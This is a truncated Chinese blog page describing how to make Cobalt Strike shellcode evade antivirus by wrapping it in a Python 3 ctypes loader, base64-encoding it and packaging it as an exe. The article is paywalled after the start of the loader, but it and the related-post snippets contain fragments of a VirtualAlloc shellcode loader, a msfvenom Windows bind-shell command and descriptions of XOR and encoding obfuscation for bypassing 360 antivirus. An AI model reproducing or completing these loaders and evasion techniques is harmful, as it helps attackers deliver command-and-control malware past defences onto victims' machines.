python3+Cobal Strikeshellcode免杀技术

最新推荐文章于 2023-08-02 22:21:59 发布
最新推荐文章于 2023-08-02 22:21:59 发布
阅读量3.2k 收藏 4
点赞数 4
分类专栏: 渗透测试 网络安全 文章标签: 安全 python 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44905657/article/details/122087879
版权
本文介绍了如何使用python3处理Cobal Strike(CS)生成的shellcode进行免杀。首先,通过CS神器生成64位python格式payload,将shellcode插入python脚本并打包成exe。尽管初次尝试被杀毒软件检测到,但通过base64编码和解码的第二种方法,成功避免了360的查杀,并在virscan.org上展示了较好的免杀效果。后续文章将继续探讨更多免杀策略。
摘要由CSDN通过智能技术生成

python3处理shellcode

目前使用python3处理CS神器生成的shellcode免杀效果还是可以的;本章我们使用基于python3的脚本对shellcode做处理,生成exe后进行免杀。

第一种

首先我们kali打开CS神器服务端
在这里插入图片描述
客户端启动
在这里插入图片描述
创建一个监听器
在这里插入图片描述
使用CS神器生成python格式的payload
在这里插入图片描述
这里记得点击使用64位的,点击生成,查看生成的payload
在这里插入图片描述
我们使用python脚本

import ctypes

#shellcode加载
def shellCodeLoad(shellcode):
    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
    ptr = ctypes.windll.kernel32.VirtualAlloc
最低0.47元/天 解锁文章
小哥们肩膀一般高
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
shellCode免杀技巧
qq_39330735的博客
05-15 2391
由上⾯的信息可⻅,国内在1997年出现了第⼀个可以⾃动变异的千⾯⼈病毒,虽然 ⾃动变异也可以看 为是针对杀毒软件的⼀种免杀⽅法,但是由于与免杀⼿法的定义 有出⼊,所以如果将国内免杀技术起源 定位1997年会显得⽐较牵强。2005年2⽉-7⽉:通过各⽅⾯有意或⽆意的宣传,⿊客爱好者们开始逐渐重视免 杀,在类似于免杀技术 界的祖师爷⿊吧安全⽹的浩天⽼师带领下⼀批⿊客开始有越 来越多的讨论免杀技术,这为以后⽊⻢免杀 的⽕爆埋下根基。\t错误值: %d\n", GetLastError());
使用Python进行防病毒免杀解析
09-18
主要介绍了使用Python进行防病毒免杀,本文给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下
Python绝技:运用Python成为顶级黑客》 用Python实现免杀
weixin_30746117的博客
05-28 359
1、免杀的过程: 使用Metasploit生成C语言风格的一些shellcode作为载荷,这里使用Windows bindshell,功能为选定一个TCP端口与cmd.exe进程绑定在一起,方便攻击者远程连接进行操控。 输入命令: msfvenom -p windows/shell_bind_tcp LPORT=1337 -f c -o payload.c 查看该c文件: 接着在...
shellcode 免杀 ——python3
时光凉春衫薄的博客
12-28 1867
python shellcode 免杀上线
cobaltstrikeshellcode免杀
qq_45414878的博客
02-02 1855
本项目是基于学习shellcode原理和免杀基础而编写,利用加密、缩小体积、混淆等方式绕过检测,主要是为了应付火绒和360。
python 执行shellcode_悬赏问答 - 关于用Python3Shellcode的问题
weixin_28729331的博客
01-28 177
小的时候,我喜欢边看电视边玩玩具,尤其是在电视放bgm时,挥舞着手里的玩具的感觉,好像它们都活了一样,而每当乐曲高潮处到来,我便肃然起敬,以至于起鸡皮疙瘩,于是我听有一些由东方原曲改变的音乐时,我也会起鸡皮疙瘩(笑)—我把自己和音乐合二为一了。那时候最享受的事,莫过于拿出变形金刚跟着电视里一起变形了,电视里酷酷卡卡的声音听起来煞是过瘾。可惜那个时候,很少有玩具装有齿轮关节,清脆的变形声音只能在电视...
Cobal_Strike踩坑记录-DNS Beacon1
08-03
Cobal_Strike踩坑记录-DNS Beacon1
Cobal_Strike_自定义OneLiner_Evi1cg's_blog1
08-03
这里以`bitsadmin`、`powershell`、`python`、`regsvr32`和`mshta`为例,分别编写了不同的命令逻辑。 8. 使用`setBody`方法替换原方法的实现,确保正确引用方法参数,注意参数引用需以`$`开头。 这个示例展示了如何...
医疗行业轻松面试技巧分析.pptx
10-21
- **COBAL编程面试**:面试者清楚地自我介绍,展示了对所学专业的热情和实际工作经验,虽然对COBAL不熟悉,但展现了积极的学习态度和对新技术的适应性。 综上所述,医疗行业面试不仅需要深厚的技术底蕴,还要求...
如何做到轻松面试.pptx
10-14
2. 另一位应聘COBAL编程的应试者,虽然未学过该语言,但通过自我介绍展示了对编程的热爱和实际操作经验。他诚实的回答展示了积极的学习态度和适应能力,同样赢得了面试官的认可。 总结来说,轻松面试并非偶然,而是...
Cobalt Strike shellcode免杀360
最新发布
qq_18193739的博客
08-02 1335
地址:https://github.com/wei930630/go-shellcode-launcher。复制选中的shellcode代码,放入上面C++ xor加密shellcode代码,并运行。将生成的xor编码的shellcode 放入shellcode加载。使用Cobalt Strike 生成shellcode 代码。使用Cobalt Strike 生成shellcode 代码。将选中的shellcode 代码,复制到新1.txt文件中。将上面的shellcode加载编译为exe文件。
python免杀
weixin_43152809的博客
07-13 704
最近学习的过程中,发现python的匿名函数很适合用于免杀python中,除了一般使用def定义的函数外,还有一种使用lambda定义的匿名函数。这种函数可以用在任何普通函数可以使用的地方,但在定义时被严格限定为单一表达式。从语义上讲,它只是普通函数的语法糖。 我的理解,匿名函数就是另外一个函数的隐含调用 下方func处无论是什么内容,都会返回system这个字符串 如果把执行内容换成whoami 如下方代码段所示: 运行就可以获取whoami信息...
Python3 Cobalt strike shellcode 免杀过 360 卫士和360杀毒
课嗨教育的专栏
09-09 695
Python2.7 现在很多杀毒软件都会查杀免杀效果有点差。可以使用 python3 来做 shellcode免杀处理。 Python3 下载下载最新的版本当前实验的版本是 Python 3.8.6 64 位pyinstaller 4.0 https://www.python.org/downloads/pip install pyinstaller Python3 shellcode 加载代码import ctypes #shellcode 加载 def shel...
eval函数python3_python3 shellcode 使用eval函数 bypass AV
weixin_39925031的博客
12-02 284
使用Python版本使用cs生成与Python版本对应的shellcodeshellcode loadimport ctypes#shellcode加载def shellCodeLoad(shellcode):ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64ptr = ctypes.windll.kernel32.Virtu...
ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载&加密工具
lza20001103的博客
09-04 2406
ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载&加密工具 文章目录ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载&加密工具一、声明二、测试环境三、生成Msf_Payload四、生成CobaltStrike_Payload五、加密Payload六、配置ShellCode加载七、打包可执行程序(EXE编译环境)八、上线测试 ShellCode_Loader - Msf&amp
python学习笔记——python转exe免杀
小橙子的博客
07-07 930
思路: 将敏感代码转码,使用时解码再执行。 参考: https://blog.csdn.net/qq_32261191/article/details/108994177 一、敏感代码使用base64编码 #-*- coding: utf-8 -*- import base64 str = """ print('123') """ #编码 encode = base64.b64encode(str.encode('utf-8')) print(encode) 结果: b'CnByaW50
eval函数_python3 shellcode 使用eval函数 bypass AV
weixin_39997695的博客
11-30 106
使用Python版本使用cs生成与Python版本对应的shellcodeshellcode loadimport ctypes#shellcode加载def shellCodeLoad(shellcode): ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64 ptr = ctypes.windll.k...
大型主机编程入门:COBOL编译与运行教程
3. **实验内容**:具体操作步骤包括登录大型机、建立所需的分区数据集(例如,存放源代码的UR012.COBOL.SOURCE,JCL程序的UR012.COBOL.JCL,以及编译结果的UR012.COBOL.LOAD),然后编写和输入COBOL源程序和JCL程序...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值